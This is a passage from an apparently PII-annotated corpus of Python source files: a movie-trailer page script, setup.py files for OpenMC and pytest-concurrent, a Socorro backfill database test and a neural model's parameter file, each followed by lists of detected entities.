['URL', 'socket.er'], ['URL', 'LOG.er'], ['URL', 'self.tsd.cl'], ['URL', 'socket.er'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'tags.st'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'tags.it'], ['URL', 'LOG.er'], ['URL', 'urllib2.Re'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'req.ad'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'req.ad'], ['URL', 'response.ge'], ['URL', 'self.se'], ['URL', 'response.ge'], ['URL', 'LOG.se'], ['URL', 'logging.IN'], ['URL', 'logging.St'], ['URL', 'sys.st'], ['URL', 'ch.se'], ['URL', 'logging.Fo'], ['URL', 'LOG.ad'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'sys.ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'options.de'], ['URL', 'parser.er'], ['URL', 'options.de'], ['URL', 'parser.er'], ['URL', 'options.re'], ['URL', 'parser.er'], ['URL', 'options.ma'], ['URL', 'options.ba'], ['URL', 'options.ba'], ['URL', 'os.fo'], ['URL', 'os.ch'], ['URL', 'os.se'], ['URL', 'os.fo'], ['URL', 'os.de'], ['URL', 'os.de'], ['URL', 'stdin.fi'], ['URL', 'stdout.fi'], ['URL', 'stdout.fi'], ['URL', 'stdin.cl'], ['URL', 'stdout.cl'], ['URL', 'os.cl'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'os.environ.ge'], ['URL', 'LOG.de'], ['URL', 'options.ma'], ['URL', 'options.ba'], ['URL', 'options.ve'], ['URL', 'LOG.se'], ['URL', 'logging.DE'], ['URL', 're.ma'], ['URL', 'options.st'], ['URL', 'socket.ge'], ['URL', 'options.cd'], ['URL', 'os.path.re'], ['URL', 'options.cd'], ['URL', 'os.path.is'], ['URL', 'options.cd'], ['URL', 'options.cd'], ['URL', 'options.cd'], ['URL', 'atexit.re'], ['URL', 'signal.SI'], ['URL', 'signal.SI'], ['URL', 'signal.si'], ['URL', 'options.de'], ['URL', 'reader.st'], ['URL', 'options.no'], ['URL', 'options.re'], ['URL', 'options.ht'], ['URL', 'options.ht'], ['URL', 'options.ht'], ['URL', 'options.ma'], ['URL', 'sender.st'], ['URL', 'LOG.in'], ['URL', 'options.st'], ['URL', 'sys.stdin.cl'], ['URL', 'col.sh'], ['URL', 'LOG.de'], ['URL', 'reader.jo'], ['URL', 'LOG.de'], ['URL', 'sender.jo'], ['URL', 'time.sl'], ['URL', 'LOG.in'], ['URL', 'options.cd'], ['URL', 'time.sl'], ['URL', 'LOG.in'], ['URL', 'os.path.is'], ['URL', 'os.li'], ['URL', 'os.path.is'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'options.cd'], ['URL', 'sys.pa'], ['URL', 'os.path.jo'], ['URL', 'os.path.ge'], ['URL', 'LOG.in'], ['URL', 'os.path.jo'], ['URL', 'options.cd'], ['URL', 'os.path.jo'], ['URL', 'modules.it'], ['URL', 'os.path.ge'], ['URL', 'LOG.in'], ['URL', 'LOG.in'], ['URL', 'os.path.jo'], ['URL', 'os.path.ge'], ['URL', 'os.ge'], ['URL', 'f.cl'], ['URL', 'COLLECTORS.it'], ['URL', 'col.de'], ['URL', 'col.la'], ['URL', 'col.pro'], ['URL', 'signal.SI'], ['URL', 'os.ki'], ['URL', 'LOG.in'], ['URL', 'col.sh'], ['URL', 'LOG.in'], ['URL', 'col.pro'], ['URL', 'col.pro'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.de'], ['URL', 'col.na'], ['URL', 'col.la'], ['URL', 'col.de'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.fi'], ['URL', 'col.mt'], ['URL', 'col.la'], ['URL', 'col.la'], ['URL', 'options.al'], ['URL', 'col.na'], ['URL', 'col.la'], ['URL', 'col.sh'], ['URL', 'options.re'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.fi'], ['URL', 'col.mt'], ['URL', 'col.la'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 're.se'], ['URL', 'col.na'], ['URL', 'col.pro'], ['URL', 'col.fi'], ['URL', 'os.se'], ['URL', 'LOG.er'], ['URL', 'col.fi'], ['URL', 'col.la'], ['URL', 'col.proc.stdout.fi'], ['URL', 'col.proc.stderr.fi'], ['URL', 'col.pro'], ['URL', 'col.de'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.pro'], ['URL', 'LOG.er'], ['URL', 'col.fi'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.int'], ['URL', 'col.la'], ['URL', 'col.pro'], ['URL', 'col.ne'], ['URL', 'col.ki'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.pro'], ['URL', 'col.ne'], ['URL', 'col.ki'], ['URL', 'col.ki'], ['URL', 'LOG.er'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.pro'], ['URL', 'signal.SI'], ['URL', 'col.ne'], ['URL', 'col.ki'], ['URL', 'LOG.er'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.ne'], ['URL', 'os.li'], ['URL', 'interval.is'], ['URL', 'os.li'], ['URL', 'colname.st'], ['URL', 'os.path.is'], ['URL', 'os.ac'], ['URL', 'os.path.ge'], ['URL', 'col.int'], ['URL', 'LOG.er'], ['URL', 'col.int'], ['URL', 'col.ge'], ['URL', 'col.mt'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.mt'], ['URL', 'col.int'], ['URL', 'col.sh'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.ge'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.sh'], ['URL', 'col.na'], ['URL', 'sys.ar']]" +15,"import media +import fav_movies_web + +# Instances of my favorite movies: + +# Deadpool movie: movie title, sotryline, poster image and movie trailer +deadpool = media.Movie(""Deadpool"", + """""" Wade Wilson (Ryan Reynolds) is a former Special Forces + operative who now works as a mercenary. His world comes + crashing down when evil scientist Ajax (Ed Skrein) + tortures, disfigures and transforms him into Deadpool. + The rogue experiment leaves Deadpool with accelerated + healing powers and a twisted sense of humor. With help + from mutant allies Colossus and Negasonic Teenage + Warhead (Brianna Hildebrand), Deadpool uses his new + skills to hunt down the man who nearly destroyed + his life"""""", + ""https://www.flickeringmyth.com/wp-content/uploads/2016/01/Deadpool-poster-1.jpg"", # NOQA + ""https://www.youtube.com/watch?v=Xithigfg7dA"" + ) # NOQA + +# Focus movie: movie title, sotryline, poster image and movie trailer +focus = media.Movie(""Focus"", + """"""Nicky (Will Smith), a veteran con artist, takes a + novice named Jess(Margot Robbie) under his wing. While + Nicky teaches Jess the tricks of the trade, the pair + become romantically involved; but, when Jess gets + uncomfortably close, Nicky ends their relationship."""""", + ""http://static.rogerebert.PI:KEY.jpg"", # NOQA + ""https://www.youtube.com/watch?v=MxCRgtdAuBo"" + ) # NOQA + +# Mechanic: Resurrection movie: movie title, sotryline, poster image and +# movie trailer +mechanic = media.Movie(""Mechanic: Resurrection"", + """"""Living under cover in Brazil, master assassin Arthur + Bishop(Jason Statham) springs back into action after an + old enemySam Hazeldine) kidnaps the woman (Jessica Alba) + he loves. To saveher life, Bishop must kill an + imprisoned African warlord, a humantrafficker (Toby + Eddington) and an arms dealer (Tommy Lee Jones),all + while making the deaths look like accidents. When things + don't goexactly as planned, Bishop turns the tables on + the people who forcedhim out of retirement."""""", + ""https://images-na.ssl-images-amazon.com/images/M/MV5BMjYwODExNzUwMV5BMl5BanBnXkFtZTgwNTgwNjUyOTE@._V1_UY1200_CR90,0,630,1200_AL_.jpg"", # NOQA + ""https://www.youtube.com/watch?v=G-P3f_wDXvs"" + ) # NOQA + +# Enemy movie: movie title, sotryline, poster image and movie trailer +enemy = media.Movie(""Enemy"", + """"""A mild-mannered college professor (Jake Gyllenhaal) + discovers a look-alike actor and delves into the other + man's private affairs."""""", + ""http://www.impawards.com/intl/misc/2014/posters/enemy.jpg"", # NOQA + ""https://www.youtube.com/watch?v=FJuaAWrgoUY"" + ) # NOQA + +# Wonder Woman movie: movie title, sotryline, poster image and movie trailer +wonder_woman = media.Movie(""Wonder Woman"", + """"""Before she was Wonder Woman (Gal Gadot), she was + Diana, princess ofthe Amazons, trained to be an + unconquerable warrior. Raised on asheltered island + paradise, Diana meets an American pilot (Chris Pine) + who tells her about the massive conflict that's + raging in the outsideworld. Convinced that she can + stop the threat, Diana leaves herhome for the first + time. Fighting alongside men in a war to end + allwars, she finally discovers her full powers and + true destiny"""""", + ""http://cdn2-www.comingsoon.net/assets/uploads/gallery/wonder-woman/wwposter5.jpg"", # NOQA + ""https://www.youtube.com/watch?v=1Q8fG0TtVAY"" + ) # NOQA + +# Ghost in the Shell movie: movie title, sotryline, poster image and movie +# trailer +ghost_in_the_shell = media.Movie(""Ghost in the Shell"", + """"""In the near future, Major is the first of + herkind: a human who iscyber-enhanced to be a + perfect soldier devoted to stopping theworld's + most dangerous criminals. When terrorism + reaches a newlevel that includes the ability + to hack into people's minds and control them, + Major is uniquely qualified to stop it. As + sheprepares to face a new enemy, Major + discovers that her life was stoleninstead of + saved. Now, she will stop at nothing to + recover her pastwhile punishing those who did + this to her."""""", + ""http://cdn2-www.comingsoon.net/assets/uploads/gallery/ghost-in-the-shell/ghostinshellposter.jpg"", # NOQA + ""https://www.youtube.com/watch?v=G4VmJcZR0Yg"" + ) # NOQA + +# All instances grouped together in a list +# The list is the sit of the movies that will be passed to the media file +movies = [ + deadpool, + focus, + mechanic, + enemy, wonder_woman, + ghost_in_the_shell +] + +# Open the HTML file in a webbrowser via the fav_movies_web.py +fav_movies_web.open_movies_page(movies) # the array/list (argument) +",4766,"[['PERSON', 'sotryline'], ['PERSON', 'Wade Wilson'], ['PERSON', 'Ryan Reynolds'], ['PERSON', 'Ajax'], ['PERSON', 'Ed Skrein'], ['PERSON', 'Deadpool'], ['PERSON', 'Brianna Hildebrand'], ['PERSON', 'Deadpool'], ['PERSON', 'sotryline'], ['PERSON', 'Nicky'], ['PERSON', 'Will Smith'], ['PERSON', 'Jess(Margot Robbie'], ['PERSON', 'Nicky'], ['PERSON', 'Jess'], ['PERSON', 'Jess'], ['PERSON', 'Nicky'], ['PERSON', 'sotryline'], ['LOCATION', 'Brazil'], ['PERSON', 'Arthur\n Bishop(Jason Statham'], ['PERSON', 'Hazeldine'], ['PERSON', 'Jessica Alba'], ['NRP', 'African'], ['PERSON', 'Tommy Lee Jones),all'], ['PERSON', 'sotryline'], ['PERSON', 'Movie(""Enemy'], ['PERSON', 'Jake Gyllenhaal'], ['PERSON', 'sotryline'], ['PERSON', 'Gal Gadot'], ['PERSON', 'Diana'], ['PERSON', 'Diana'], ['NRP', 'American'], ['PERSON', 'Chris Pine'], ['PERSON', 'Diana'], ['PERSON', 'herhome'], ['PERSON', 'sotryline'], ['URL', 'https://www.flickeringmyth.com/wp-content/uploads/2016/01/Deadpool-poster-1.jpg"",'], ['URL', 'https://www.youtube.com/watch?v=Xithigfg7dA""'], ['URL', 'http://static.ro'], ['URL', 'https://www.youtube.com/watch?v=MxCRgtdAuBo""'], ['URL', 'https://images-na.ssl-images-amazon.com/images/M/MV5BMjYwODExNzUwMV5BMl5BanBnXkFtZTgwNTgwNjUyOTE@._V1_UY1200_CR90,0,630,1200_AL_.jpg"",'], ['URL', 'https://www.youtube.com/watch?v=G-P3f_wDXvs""'], ['URL', 'http://www.impawards.com/intl/misc/2014/posters/enemy.jpg"",'], ['URL', 'https://www.youtube.com/watch?v=FJuaAWrgoUY""'], ['URL', 'http://cdn2-www.comingsoon.net/assets/uploads/gallery/wonder-woman/wwposter5.jpg"",'], ['URL', 'https://www.youtube.com/watch?v=1Q8fG0TtVAY""'], ['URL', 'http://cdn2-www.comingsoon.net/assets/uploads/gallery/ghost-in-the-shell/ghostinshellposter.jpg"",'], ['URL', 'https://www.youtube.com/watch?v=G4VmJcZR0Yg""'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'KEY.jp'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'web.py']]" +16,"#!/usr/bin/env python + +import glob +import numpy as np +try: + from setuptools import setup + have_setuptools = True +except ImportError: + from distutils.core import setup + have_setuptools = False + +try: + from Cython.Build import cythonize + have_cython = True +except ImportError: + have_cython = False + +kwargs = {'name': 'openmc', + 'version': '0.8.0', + 'packages': ['openmc', 'openmc.data', 'openmc.mgxs', 'openmc.model', + 'openmc.stats'], + 'scripts': glob.glob('scripts/openmc-*'), + + # Metadata + 'author': 'Will Boyd', + 'author_email': dummy@email.com', + 'description': 'OpenMC Python API', + 'url': 'https://github.com/mit-crpg/openmc', + 'classifiers': [ + 'Intended Audience :: Developers', + 'Intended Audience :: End Users/Desktop', + 'Intended Audience :: Science/Research', + 'License :: OSI Approved :: MIT License', + 'Natural Language :: English', + 'Programming Language :: Python', + 'Topic :: Scientific/Engineering' + ]} + +if have_setuptools: + kwargs.update({ + # Required dependencies + 'install_requires': ['six', 'numpy>=1.9', 'h5py', 'matplotlib'], + + # Optional dependencies + 'extras_require': { + 'decay': ['uncertainties'], + 'pandas': ['pandas>=0.17.0'], + 'sparse' : ['scipy'], + 'vtk': ['vtk', 'silomesh'], + 'validate': ['lxml'] + }, + + # Data files + 'package_data': { + 'openmc.data': ['mass.mas12', 'fission_Q_data_endfb71.h5'] + }, + }) + +# If Cython is present, add resonance reconstruction capability +if have_cython: + kwargs.update({ + 'ext_modules': cythonize('openmc/data/reconstruct.pyx'), + 'include_dirs': [np.get_include()] + }) + +setup(**kwargs) +",1920,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', ""https://github.com/mit-crpg/openmc',""], ['PERSON', 'openmc'], ['PERSON', ""Will Boyd'""], ['PERSON', 'lxml'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'distutils.co'], ['URL', 'openmc.mg'], ['URL', 'openmc.mo'], ['URL', 'openmc.st'], ['URL', 'glob.gl'], ['URL', 'email.com'], ['URL', 'mass.ma'], ['URL', 'reconstruct.py'], ['URL', 'np.ge']]" +17,"#!/usr/bin/env python +# -*- coding: utf-8 -*- + +import os +import codecs +from setuptools import setup + + +def read(fname): + file_path = os.path.join(os.path.dirname(__file__), fname) + return codecs.open(file_path, encoding='utf-8').read() + + +setup( + name='pytest-concurrent', + version='0.2.2', + author='James Wang, Reverb Chu', + author_email='jamesw96@uw.edu, dummy@email.com', + maintainer='James Wang, Reverb Chu', + maintainer_email='jamesw96@uw.edu, dummy@email.com', + license='MIT', + url='https://github.com/reverbc/pytest-concurrent', + description='Concurrently execute test cases with multithread' + ', multiprocess and gevent', + long_description=read('README.rst'), + packages=['pytest_concurrent', 'pytest_concurrent.modes'], + install_requires=[ + 'pytest>=3.1.1', + 'psutil>=5.2.2'], + classifiers=[ + 'Development Status :: 4 - Beta', + 'Framework :: Pytest', + 'Intended Audience :: Developers', + 'Topic :: Software Development :: Testing', + 'Programming Language :: Python', + 'Programming Language :: Python :: 3', + 'Programming Language :: Python :: 3.4', + 'Programming Language :: Python :: 3.5', + 'Programming Language :: Python :: 3.6', + 'Programming Language :: Python :: 3.7', + 'Programming Language :: Python :: Implementation :: CPython', + 'Operating System :: OS Independent', + 'License :: OSI Approved :: MIT License', + ], + entry_points={ + 'pytest11': [ + 'concurrent = pytest_concurrent.plugin', + ], + }, + setup_requires=['pytest-runner'], + tests_require=['pytest'], +) +",1681,"[['EMAIL_ADDRESS', ""author_email='jamesw96@uw.edu""], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', ""maintainer_email='jamesw96@uw.edu""], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', ""author='James Wang""], ['PERSON', ""Reverb Chu'""], ['PERSON', ""maintainer='James Wang""], ['PERSON', ""Reverb Chu'""], ['URL', ""https://github.com/reverbc/pytest-concurrent',""], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'uw.edu'], ['URL', 'email.com'], ['URL', 'uw.edu'], ['URL', 'email.com'], ['URL', 'README.rs'], ['URL', 'concurrent.mo'], ['URL', 'concurrent.pl']]" +18,"# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, You can obtain one at http://mozilla.org/MPL/2.0/. + +from .unittestbase import PostgreSQLTestCase +from nose.plugins.attrib import attr +from nose.tools import eq_, assert_raises +import datetime + +from socorro.external.postgresql.backfill import Backfill +from socorro.external.postgresql import staticdata, fakedata +from socorro.external import MissingArgumentError +from socorro.lib import datetimeutil + + +#============================================================================== +@attr(integration='postgres') +class TestBackfill(PostgreSQLTestCase): + """"""Tests the calling of all backfill functions"""""" + + #-------------------------------------------------------------------------- + def setUp(self): + """""" Populate tables with fake data """""" + super(TestBackfill, self).setUp() + + cursor = self.connection.cursor() + + self.tables = [] + + for table in staticdata.tables + fakedata.tables: + # staticdata has no concept of duration + if table.__module__ == 'socorro.external.postgresql.staticdata': + table = table() + else: + table = table(days=1) + table.releases = { + 'WaterWolf': { + 'channels': { + 'Nightly': { + 'versions': [{ + 'number': '18.0', + 'probability': 0.5, + 'buildid': '%s000020' + }], + 'adu': '10', + 'repository': 'nightly', + 'throttle': '1', + 'update_channel': 'nightly', + }, + }, + 'crashes_per_hour': '5', + 'guid': dummy@email.com' + }, + 'B2G': { + 'channels': { + 'Nightly': { + 'versions': [{ + 'number': '18.0', + 'probability': 0.5, + 'buildid': '%s000020' + }], + 'adu': '10', + 'repository': 'nightly', + 'throttle': '1', + 'update_channel': 'nightly', + }, + }, + 'crashes_per_hour': '5', + 'guid': dummy@email.com' + } + } + + + table_name = table.table + table_columns = table.columns + values = str(tuple([""%("" + i + "")s"" for i in table_columns])) + columns = str(tuple(table_columns)) + self.tables.append(table_name) + + # TODO: backfill_reports_clean() sometimes tries to insert a + # os_version_id that already exists + if table_name is not ""os_versions"": + for rows in table.generate_rows(): + data = dict(zip(table_columns, rows)) + query = ""INSERT INTO %(table)s "" % {'table': table_name} + query = query + columns.replace(""'"", """").replace("",)"", "")"") + query = query + "" VALUES "" + query = query + values.replace("",)"", "")"").replace(""'"", """") + + cursor.execute(query, data) + self.connection.commit() + + #-------------------------------------------------------------------------- + def tearDown(self): + """""" Cleanup the database, delete tables and functions """""" + + cursor = self.connection.cursor() + tables = str(self.tables).replace(""["", """").replace(""]"", """") + cursor.execute(""TRUNCATE "" + tables.replace(""'"", """") + "" CASCADE;"") + + self.connection.commit() + self.connection.close() + + super(TestBackfill, self).tearDown() + + #-------------------------------------------------------------------------- + def setup_data(self): + + self.now = datetimeutil.utc_now() + now = self.now.date() + yesterday = now - datetime.timedelta(days=1) + lastweek = now - datetime.timedelta(days=7) + now_str = datetimeutil.date_to_string(now) + yesterday_str = datetimeutil.date_to_string(yesterday) + lastweek_str = datetimeutil.date_to_string(lastweek) + + self.test_source_data = { + # Test backfill_adu + 'adu': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_all_dups + 'all_dups': { + 'params': { + ""start_date"": yesterday_str, + ""end_date"": now_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_build_adu + 'build_adu': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_correlations + 'correlations': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_crashes_by_user_build + 'crashes_by_user_build': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_crashes_by_user + 'crashes_by_user': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + + # TODO: Test backfill_daily_crashes tries to insert into a table + # that do not exists. It can be fixed by creating a temporary one. + #'daily_crashes': { + # 'params': { + # ""update_day"": now_str, + # }, + # 'res_expected': [(True,)], + # }, + + # Test backfill_exploitability + 'exploitability': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_explosiveness + 'explosiveness': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_home_page_graph_build + 'home_page_graph_build': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_home_page_graph + 'home_page_graph': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_matviews + 'matviews': { + 'params': { + ""start_date"": yesterday_str, + ""reports_clean"": 'false', + }, + 'res_expected': [(True,)], + }, + # Test backfill_nightly_builds + 'nightly_builds': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_rank_compare + 'rank_compare': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_reports_clean + 'reports_clean': { + 'params': { + ""start_date"": yesterday_str, + ""end_date"": now_str, + }, + 'res_expected': [(True,)], + }, + + # TODO: Test backfill_reports_duplicates tries to insert into a + # table that do not exists. It can be fixed by using the update + # function inside of the backfill. + #'reports_duplicates': { + # 'params': { + # ""start_date"": yesterday_str, + # ""end_date"": now_str, + # }, + # 'res_expected': [(True,)], + # }, + + # TODO: Test backfill_signature_counts tries to insert into + # tables and to update functions that does not exist. + #'signature_counts': { + # 'params': { + # ""start_date"": yesterday_str, + # ""end_date"": now_str, + # }, + # 'res_expected': [(True,)], + # }, + + # Test backfill_tcbs_build + 'tcbs_build': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_tcbs + 'tcbs': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_weekly_report_partitions + 'weekly_report_partitions': { + 'params': { + ""start_date"": lastweek_str, + ""end_date"": now_str, + ""table_name"": 'raw_crashes', + }, + 'res_expected': [(True,)], + }, + # TODO: Update Backfill to support signature_summary backfill + # through the API + #'signature_summary_products': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_installations': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_uptime': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_os': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_process_type': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_architecture': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_flash_version': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_device': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_graphics': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + } + + #-------------------------------------------------------------------------- + def test_get(self): + + backfill = Backfill(config=self.config) + + #...................................................................... + # Test raise error if kind of backfill is not passed + params = {""backfill_type"": ''} + assert_raises(MissingArgumentError, backfill.get, **params) + + #...................................................................... + # Test all the backfill functions + self.setup_data() + for test, data in self.test_source_data.items(): + data['params']['backfill_type'] = str(test) + res = backfill.get(**data['params']) + eq_(res[0], data['res_expected'][0]) +",12516,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', 'staticdata.tables'], ['PERSON', 'table.releases'], ['PERSON', 'adu'], ['PERSON', 'crashes_per_hour'], ['PERSON', 'adu'], ['PERSON', 'crashes_per_hour'], ['PERSON', 'table_columns ='], ['DATE_TIME', 'yesterday'], ['LOCATION', 'lastweek_str'], ['LOCATION', 'datetimeutil.date_to_string(lastweek'], ['PERSON', 'TODO'], ['PERSON', 'TODO'], ['LOCATION', 'lastweek_str'], ['PERSON', 'signature_summary_device'], ['URL', 'http://mozilla.org/MPL/2.0/.'], ['URL', 'nose.plugins.at'], ['URL', 'nose.to'], ['URL', 'socorro.external.postgresql.ba'], ['URL', 'socorro.li'], ['URL', 'self.connection.cu'], ['URL', 'socorro.external.postgresql.st'], ['URL', 'table.re'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'table.co'], ['URL', 'table.ge'], ['URL', 'columns.re'], ['URL', 'values.re'], ['URL', 'self.connection.com'], ['URL', 'self.connection.cu'], ['URL', 'tables.re'], ['URL', 'self.connection.com'], ['URL', 'self.connection.cl'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.co'], ['URL', 'backfill.ge'], ['URL', 'self.se'], ['URL', 'data.it'], ['URL', 'backfill.ge']]" +19,"# -*- coding: utf-8 -*- +# ----------------------------------------------------------------------------- +# Copyright (c) 2015, Nicolas P. Rougier +# Distributed under the (new) BSD License. +# +# Contributors: Nicolas P. Rougier (dummy@email.com) +# ----------------------------------------------------------------------------- + +# --- Time --- +ms = 0.001 +dt = 1*ms +tau = 10*ms + +# --- Learning --- +alpha_CUE = 0.050 +alpha_LTP = 0.002 +alpha_LTD = 0.001 + +# --- Sigmoid --- +Vmin = 0 +Vmax = 20 +Vh = 16 +Vc = 3 + +# --- Model --- +decision_threshold = 40 +noise = 0.001 +CTX_rest = -3.0 +STR_rest = 0.0 +STN_rest = -10.0 +GPI_rest = 10.0 +THL_rest = -40.0 + +# --- Cues & Rewards --- +V_cue = 7 +rewards = 3/3.,2/3.,1/3.,0/3. + +# -- Weight --- +Wmin = 0.25 +Wmax = 0.75 +gains = { ""CTX.cog -> STR.cog"" : +1.0, + ""CTX.mot -> STR.mot"" : +1.0, + ""CTX.ass -> STR.ass"" : +1.0, + ""CTX.cog -> STR.ass"" : +0.2, + ""CTX.mot -> STR.ass"" : +0.2, + ""CTX.cog -> STN.cog"" : +1.0, + ""CTX.mot -> STN.mot"" : +1.0, + ""STR.cog -> GPI.cog"" : -2.0, + ""STR.mot -> GPI.mot"" : -2.0, + ""STR.ass -> GPI.cog"" : -2.0, + ""STR.ass -> GPI.mot"" : -2.0, + ""STN.cog -> GPI.cog"" : +1.0, + ""STN.mot -> GPI.mot"" : +1.0, + ""GPI.cog -> THL.cog"" : -0.25, + ""GPI.mot -> THL.mot"" : -0.25, + + ""THL.cog -> CTX.cog"" : +0.4, + ""THL.mot -> CTX.mot"" : +0.4, + ""CTX.cog -> THL.cog"" : +0.1, + ""CTX.mot -> THL.mot"" : +0.1, + + ""CTX.mot -> CTX.mot"" : +0.5, + ""CTX.cog -> CTX.cog"" : +0.5, + ""CTX.ass -> CTX.ass"" : +0.5, + + ""CTX.ass -> CTX.cog"" : +0.01, + ""CTX.ass -> CTX.mot"" : +0.025, + ""CTX.cog -> CTX.ass"" : +0.025, + ""CTX.mot -> CTX.ass"" : +0.01, + } +",1837,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015'], ['PERSON', 'Nicolas P. Rougier'], ['PERSON', 'Nicolas P. Rougier'], ['PERSON', 'Vmin'], ['PERSON', 'Vmax'], ['PERSON', 'Wmax'], ['URL', 'email.com'], ['URL', 'CTX.co'], ['URL', 'STR.co'], ['URL', 'CTX.mo'], ['URL', 'STR.mo'], ['URL', 'CTX.as'], ['URL', 'STR.as'], ['URL', 'CTX.co'], ['URL', 'STR.as'], ['URL', 'CTX.mo'], ['URL', 'STR.as'], ['URL', 'CTX.co'], ['URL', 'STN.co'], ['URL', 'CTX.mo'], ['URL', 'STN.mo'], ['URL', 'STR.co'], ['URL', 'GPI.co'], ['URL', 'STR.mo'], ['URL', 'GPI.mo'], ['URL', 'STR.as'], ['URL', 'GPI.co'], ['URL', 'STR.as'], ['URL', 'GPI.mo'], ['URL', 'STN.co'], ['URL', 'GPI.co'], ['URL', 'STN.mo'], ['URL', 'GPI.mo'], ['URL', 'GPI.co'], ['URL', 'THL.co'], ['URL', 'GPI.mo'], ['URL', 'THL.mo'], ['URL', 'THL.co'], ['URL', 'CTX.co'], ['URL', 'THL.mo'], ['URL', 'CTX.mo'], ['URL', 'CTX.co'], ['URL', 'THL.co'], ['URL', 'CTX.mo'], ['URL', 'THL.mo'], ['URL', 'CTX.mo'], ['URL', 'CTX.mo'], ['URL', 'CTX.co'], ['URL', 'CTX.co'], ['URL', 'CTX.as'], ['URL', 'CTX.as'], ['URL', 'CTX.as'], ['URL', 'CTX.co'], ['URL', 'CTX.as'], ['URL', 'CTX.mo'], ['URL', 'CTX.co'], ['URL', 'CTX.as'], ['URL', 'CTX.mo'], ['URL', 'CTX.as']]" +20,"# encoding: utf-8 +# +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the 